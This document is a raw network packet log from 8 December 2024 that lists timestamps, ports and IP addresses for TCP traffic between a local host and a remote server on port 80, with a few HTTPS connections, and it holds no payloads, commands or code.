Dec 8, 2024 13:31:51.946389914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.946435928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.947110891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.947221994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.947252989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.947274923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.948016882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.948107958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.948158979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.948832989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.948882103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.948992014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.949121952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.949656010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.949704885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.949759007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.949809074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.950530052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.950575113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.950619936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.951359987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.951427937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.951435089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.951477051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.952217102 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.952271938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.952318907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.952413082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.953103065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.953157902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.953226089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.953355074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.953959942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.954005003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.954057932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.954157114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.954821110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.954870939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.954894066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.954924107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.955626011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.955682993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.955740929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.955941916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.956481934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.956532955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.956593990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.956633091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.957359076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.957535982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.957544088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.957644939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.958317995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.958364964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.958409071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.958446026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.959045887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.959090948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.959136963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.959178925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.959888935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.959979057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.959999084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.960035086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.960758924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.960802078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.960916996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.960958958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.961592913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.961633921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.961771965 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.961813927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.962460995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.962505102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.962560892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.962604046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.963308096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.963355064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.963404894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.963449001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.964154005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.964274883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.964315891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.965013981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.965059042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.965141058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.965229988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.965879917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.965954065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.965975046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.966037989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.966725111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.966769934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.966789007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.966824055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.967557907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.967624903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.967643023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.967674017 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.968436956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.968483925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.968492031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.968529940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.969254971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.969309092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.969372034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.969424963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.970221996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.970267057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.970284939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.970326900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.970983982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.971028090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.971152067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.971199989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.971920967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.971959114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.971995115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.972038984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.972652912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.972795010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.972803116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.972841978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.973535061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.973577023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.973598003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.973633051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.974400043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.974443913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.974504948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.974646091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.975229025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.975265026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.975344896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.975382090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.976150036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.976181984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.976202011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.976242065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.976914883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.976954937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.976979017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.977163076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.977830887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.977869034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.977895021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.977932930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.978627920 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.978666067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.978688002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.978729963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.979490995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.979528904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.979650974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.979688883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.980757952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.980798960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.980806112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.980838060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.981492996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.981534958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.981545925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.981576920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.982096910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.982135057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.982198000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.982243061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.983073950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.983114958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.983138084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.983177900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.983767033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.983803034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.983850956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.983906984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.984596014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.984632015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.984775066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.984810114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.985599995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.985611916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.985636950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.985663891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.986448050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.986459017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.986489058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.987199068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.987240076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.987317085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.987427950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.988421917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.988462925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.988481045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.988512039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.988946915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.989000082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.989020109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.989057064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.989706039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.989756107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.989783049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.989828110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.990533113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.990628958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.990669966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.990712881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.991666079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:51.991730928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:51.993478060 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.995038033 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.995047092 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:51.995486975 CET	49848	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:51.995491982 CET	443	49848	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:52.101690054 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:52.101835012 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.101936102 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:52.101979971 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.101984978 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:52.102044106 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.102710009 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.102710962 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.102735996 CET	443	49847	150.171.28.10	192.168.2.6
Dec 8, 2024 13:31:52.102802038 CET	49847	443	192.168.2.6	150.171.28.10
Dec 8, 2024 13:31:52.136565924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.136616945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.136661053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.136946917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.136991978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.137340069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.137391090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.137808084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.137851954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.137907028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.137974024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.138647079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.138695955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.138766050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.138806105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.139492035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.139538050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.139611959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.139672995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.140335083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.140377998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.140445948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.140484095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.141206980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.141253948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.141318083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.141354084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.142159939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.142226934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.142250061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.142292976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.142888069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.142947912 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.142952919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.142998934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.143749952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.143801928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.143853903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.143893003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.144587994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.144645929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.144800901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.144851923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.145471096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.145533085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.145592928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.145632029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.146547079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.146605015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.146706104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.146747112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.147305012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.147353888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.147383928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.147433043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.147984028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.148022890 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.148128033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.148169041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.148833036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.148874998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.148929119 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.148971081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.149734020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.149791956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.149808884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.149848938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.150562048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.150609970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.150674105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.150818110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.151417971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.151459932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.151479006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.151520967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.152228117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.152266979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.152307034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.152344942 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.153402090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.153414011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.153445005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.153461933 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.153996944 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.154037952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.154089928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.154129028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.154831886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.154881954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.154988050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.155029058 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.155646086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.155697107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.155802965 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.155838966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.156603098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.156666994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.156820059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.156891108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.157388926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.157444000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.157463074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.157567024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.158257008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.158312082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.158339024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.158380985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.159070969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.159130096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.159157991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.159203053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.159965038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.160038948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.160053968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.160101891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:52.160780907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:52.160835981 CET	49835	80	192.168.2.6	185.215.113.206
